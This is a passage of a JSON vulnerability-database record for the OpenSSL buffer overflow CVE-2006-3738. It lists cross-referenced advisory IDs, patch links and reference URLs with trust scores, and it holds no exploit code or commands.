          },
          {
            "db": "SECUNIA",
            "id": "22116",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22216",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22220",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22330",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22240",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22259",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22260",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22165",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22166",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22172",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22284",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22186",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22193",
            "trust": 1.8
          },
          {
            "db": "SECUNIA",
            "id": "22094",
            "trust": 1.8
          },
          {
            "db": "SECTRACK",
            "id": "1016943",
            "trust": 1.8
          },
          {
            "db": "USCERT",
            "id": "TA06-333A",
            "trust": 1.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788",
            "trust": 1.1
          },
          {
            "db": "SECUNIA",
            "id": "30161",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "26329",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24930",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "30124",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22500",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22799",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22298",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "31492",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23038",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22460",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23915",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22385",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23155",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22487",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22654",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23680",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22626",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23794",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22633",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22772",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "24950",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "25889",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22544",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "23340",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22791",
            "trust": 1.0
          },
          {
            "db": "SECUNIA",
            "id": "22758",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-1401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-0343",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3902",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3869",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3860",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4401",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4314",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2315",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4264",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4036",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4417",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4750",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3820",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2007-2783",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-3936",
            "trust": 1.0
          },
          {
            "db": "VUPEN",
            "id": "ADV-2006-4443",
            "trust": 1.0
          },
          {
            "db": "SECTRACK",
            "id": "1017522",
            "trust": 1.0
          },
          {
            "db": "OSVDB",
            "id": "29262",
            "trust": 1.0
          },
          {
            "db": "BID",
            "id": "20246",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#386964",
            "trust": 0.8
          },
          {
            "db": "SECUNIA",
            "id": "21709",
            "trust": 0.8
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620",
            "trust": 0.8
          },
          {
            "db": "XF",
            "id": "29237",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "SA06-333A",
            "trust": 0.8
          },
          {
            "db": "USCERT",
            "id": "TA07-017A",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "169663",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50595",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50543",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "53566",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50535",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "59797",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50560",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "101257",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "58346",
            "trust": 0.1
          },
          {
            "db": "PACKETSTORM",
            "id": "50548",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "PACKETSTORM",
            "id": "169663"
          },
          {
            "db": "PACKETSTORM",
            "id": "50595"
          },
          {
            "db": "PACKETSTORM",
            "id": "50543"
          },
          {
            "db": "PACKETSTORM",
            "id": "53566"
          },
          {
            "db": "PACKETSTORM",
            "id": "50535"
          },
          {
            "db": "PACKETSTORM",
            "id": "59797"
          },
          {
            "db": "PACKETSTORM",
            "id": "50560"
          },
          {
            "db": "PACKETSTORM",
            "id": "101257"
          },
          {
            "db": "PACKETSTORM",
            "id": "58346"
          },
          {
            "db": "PACKETSTORM",
            "id": "50548"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "id": "VAR-200609-0823",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.28107159000000004
      },
      "last_update_date": "2026-03-05T22:12:20.082000Z",
      "patch": {
        "_id": null,
        "data": [
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://www2.itrc.hp.com/service/cki/docDisplay.do?docId=c00805100"
          },
          {
            "title": "HPSBUX02174",
            "trust": 0.8,
            "url": "http://h50221.www5.hp.com/upassist/itrc_japan/assist2/secbltn/HP-UX/HPSBUX02174.html"
          },
          {
            "title": "openssl (V2.x)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=1003"
          },
          {
            "title": "openssl (V4.0)",
            "trust": 0.8,
            "url": "http://www.miraclelinux.com/support/update/list.php?errata_id=459"
          },
          {
            "title": "secadv_20060928",
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "https://rhn.redhat.com/errata/RHSA-2006-0695.html"
          },
          {
            "title": "102711",
            "trust": 0.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "title": "readme_iwss11_sol_patch7_b1182",
            "trust": 0.8,
            "url": "http://www.trendmicro.com/ftp/jp/ucmodule/iwss/sol/11/readme_iwss11_sol_patch7_b1182.txt"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2006/TLSA-2006-33.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.com/security/2007/TLSA-2007-52.txt"
          },
          {
            "title": "Critical Patch Update - January 2007",
            "trust": 0.8,
            "url": "http://otn.oracle.co.jp/security/070119_77/top.html"
          },
          {
            "title": "RHSA-2006:0695",
            "trust": 0.8,
            "url": "http://www.jp.redhat.com/support/errata/RHSA/RHSA-2006-0695J.html"
          },
          {
            "title": "TLSA-2006-33",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2006/TLSA-2006-33j.txt"
          },
          {
            "title": "TLSA-2007-52",
            "trust": 0.8,
            "url": "http://www.turbolinux.co.jp/security/2007/TLSA-2007-52j.txt"
          },
          {
            "title": "vu386964-547300",
            "trust": 0.8,
            "url": "http://software.fujitsu.com/jp/security/vulnerabilities/vu386964-547300.html"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 3.4,
            "url": "http://www.securityfocus.com/bid/22083"
          },
          {
            "trust": 2.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt"
          },
          {
            "trust": 2.1,
            "url": "http://www.kb.cert.org/vuls/id/547300"
          },
          {
            "trust": 1.8,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1"
          },
          {
            "trust": 1.8,
            "url": "http://www.securityfocus.com/bid/20249"
          },
          {
            "trust": 1.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta06-333a.html"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23280/"
          },
          {
            "trust": 1.6,
            "url": "http://secunia.com/advisories/23309/"
          },
          {
            "trust": 1.4,
            "url": "http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html"
          },
          {
            "trust": 1.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-260.htm"
          },
          {
            "trust": 1.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sr-20061108-openssl.shtml"
          },
          {
            "trust": 1.3,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt"
          },
          {
            "trust": 1.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-3738"
          },
          {
            "trust": 1.2,
            "url": "http://issues.rpath.com/browse/rpl-613"
          },
          {
            "trust": 1.1,
            "url": "http://www.red-database-security.com/advisory/oracle_sql_injection_dbms_aq_inv.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.red-database-security.com/advisory/oracle_cpu_jan_2007.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx2/doc/esx-202-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-3069097-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-254-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx21/doc/esx-213-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/esx25/doc/esx-253-200612-patch.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/support/vi3/doc/esx-9986131-patch.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22385"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22172"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/26329"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a4256"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22330"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22220"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=130497311408250\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22116"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22799"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22094"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22654"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3860"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1185"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22193"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22216"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4401"
          },
          {
            "trust": 1.0,
            "url": "http://www.oracle.com/technetwork/topics/security/cpujan2007-101493.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22633"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:172"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1017522"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447318/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2006\u0026m=slackware-security.676946"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22626"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22212"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23309"
          },
          {
            "trust": 1.0,
            "url": "http://lists.apple.com/archives/security-announce/2006/nov/msg00001.html"
          },
          {
            "trust": 1.0,
            "url": "http://openvpn.net/changelog.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2783"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22460"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/470460/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22487"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29237"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22240"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22772"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00805100"
          },
          {
            "trust": 1.0,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9370"
          },
          {
            "trust": 1.0,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:178"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24950"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4314"
          },
          {
            "trust": 1.0,
            "url": "http://www.debian.org/security/2006/dsa-1195"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/447393/100/0/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23915"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/25889"
          },
          {
            "trust": 1.0,
            "url": "ftp://patches.sgi.com/support/free/security/advisories/20061001-01-p.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22298"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23155"
          },
          {
            "trust": 1.0,
            "url": "http://www.redhat.com/support/errata/rhsa-2006-0695.html"
          },
          {
            "trust": 1.0,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2006-220.htm"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4036"
          },
          {
            "trust": 1.0,
            "url": "http://www.serv-u.com/releasenotes/"
          },
          {
            "trust": 1.0,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-007.txt.asc"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22165"
          },
          {
            "trust": 1.0,
            "url": "http://securitytracker.com/id?1016943"
          },
          {
            "trust": 1.0,
            "url": "http://www.securityfocus.com/archive/1/456546/100/200/threaded"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22259"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23038"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_24_sr.html"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/2315"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3820"
          },
          {
            "trust": 1.0,
            "url": "http://sourceforge.net/project/shownotes.php?release_id=461863\u0026group_id=69227"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/1401"
          },
          {
            "trust": 1.0,
            "url": "http://docs.info.apple.com/article.html?artnum=304829"
          },
          {
            "trust": 1.0,
            "url": "http://www.trustix.org/errata/2006/0054"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23280"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22130"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22166"
          },
          {
            "trust": 1.0,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-201531-1"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2007/0343"
          },
          {
            "trust": 1.0,
            "url": "http://www.ubuntu.com/usn/usn-353-1"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23794"
          },
          {
            "trust": 1.0,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01118771"
          },
          {
            "trust": 1.0,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-06:23.openssl.asc"
          },
          {
            "trust": 1.0,
            "url": "http://www.openpkg.org/security/advisories/openpkg-sa-2006.021-openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4443"
          },
          {
            "trust": 1.0,
            "url": "http://www.osvdb.org/29262"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/31492"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3902"
          },
          {
            "trust": 1.0,
            "url": "http://www.cisco.com/en/us/products/hw/contnetw/ps4162/tsd_products_security_response09186a008077af1b.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22260"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22284"
          },
          {
            "trust": 1.0,
            "url": "http://www.novell.com/linux/security/advisories/2006_58_openssl.html"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22500"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3869"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22186"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30124"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/30161"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200612-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22544"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23680"
          },
          {
            "trust": 1.0,
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200805-07.xml"
          },
          {
            "trust": 1.0,
            "url": "http://security.gentoo.org/glsa/glsa-200610-11.xml"
          },
          {
            "trust": 1.0,
            "url": "http://itrc.hp.com/service/cki/docdisplay.do?docid=c00849540"
          },
          {
            "trust": 1.0,
            "url": "https://www2.itrc.hp.com/service/cki/docdisplay.do?docid=c00967144"
          },
          {
            "trust": 1.0,
            "url": "http://www130.nortelnetworks.com/go/main.jsp?cscat=bltndetail\u0026documentoid=498093\u0026renditionid=\u0026poid=8881"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/3936"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4750"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22791"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22758"
          },
          {
            "trust": 1.0,
            "url": "http://openbsd.org/errata.html#openssl2"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4264"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/24930"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/23340"
          },
          {
            "trust": 1.0,
            "url": "http://secunia.com/advisories/22207"
          },
          {
            "trust": 1.0,
            "url": "http://www.mandriva.com/security/advisories?name=mdksa-2006:177"
          },
          {
            "trust": 1.0,
            "url": "http://www.vupen.com/english/advisories/2006/4417"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23386964/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20246"
          },
          {
            "trust": 0.8,
            "url": "http://www.imc.org/ietf-openpgp/mail-archive/msg14307.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.matasano.com/log/469/many-rsa-signatures-may-be-forgeable-in-openssl-and-elsewhere/"
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060905.txt "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/21709/"
          },
          {
            "trust": 0.8,
            "url": "http://www.rsasecurity.com/rsalabs/node.asp?id=2125"
          },
          {
            "trust": 0.8,
            "url": "http://www.ietf.org/rfc/rfc3447.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-september/049715.html "
          },
          {
            "trust": 0.8,
            "url": "https://issues.rpath.com/browse/rpl-613 "
          },
          {
            "trust": 0.8,
            "url": "http://www.openssl.org/news/secadv_20060928.txt "
          },
          {
            "trust": 0.8,
            "url": "http://kolab.org/security/kolab-vendor-notice-11.txt "
          },
          {
            "trust": 0.8,
            "url": "http://openvpn.net/changelog.html "
          },
          {
            "trust": 0.8,
            "url": "http://www.serv-u.com/releasenotes/ "
          },
          {
            "trust": 0.8,
            "url": "http://openbsd.org/errata.html#openssl2 "
          },
          {
            "trust": 0.8,
            "url": "http://www.securityfocus.com/bid/20249 "
          },
          {
            "trust": 0.8,
            "url": "http://securitytracker.com/id?1016943 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22094 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22165 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22186 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22193 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22207 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22259 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22260 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22166 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22172 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22212 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22240 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22216 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22116 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22220 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22284 "
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22330 "
          },
          {
            "trust": 0.8,
            "url": "http://xforce.iss.net/xforce/xfdb/29237 "
          },
          {
            "trust": 0.8,
            "url": "http://www.frsirt.com/english/advisories/2006/3820"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta06-333a/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23547300"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta07-017a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta06-333a"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/trta07-017a"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2006-3738"
          },
          {
            "trust": 0.8,
            "url": "http://secunia.com/advisories/22130/"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa06-333a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/techalerts/ta07-017a.html"
          },
          {
            "trust": 0.6,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0264.html"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2940"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-4343"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-3738"
          },
          {
            "trust": 0.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2006-2937"
          },
          {
            "trust": 0.4,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.4,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-4343"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2940"
          },
          {
            "trust": 0.4,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-2937"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-air-20061108-openssl.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://www.itefix.no/phpws/index.php?module=announce\u0026ann_user_op=view\u0026ann_id=80"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?lang=en\u0026cc=us\u0026objectid=c00967144"
          },
          {
            "trust": 0.3,
            "url": "http://www1.itrc.hp.com/service/cki/docdisplay.do?admit=-682735245+1165342903618+28353475\u0026docid=c00805100"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/sas/f/hmc/home.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/modules.php?op=modload\u0026name=news\u0026file=article\u0026sid=31\u0026mode=thread\u0026order=0\u0026thold=0"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-452.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cyberguard.info/snapgear/releases.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.stonesoft.com/en/support/security_advisories/2909_2006.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102711-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "/archive/1/481217"
          },
          {
            "trust": 0.3,
            "url": "https://www.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c02475053"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0525.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0629.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-102668-1\u0026searchclause="
          },
          {
            "trust": 0.3,
            "url": "http://www116.nortelnetworks.com/pub/repository/clarify/document/2006/44/021420-01.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://a1851.g.akamaitech.net/f/1851/2996/24h/cacheb.xerox.com/downloads/usa/en/c/cert_essnetwork_xrx07001_v1.pdf"
          },
          {
            "trust": 0.3,
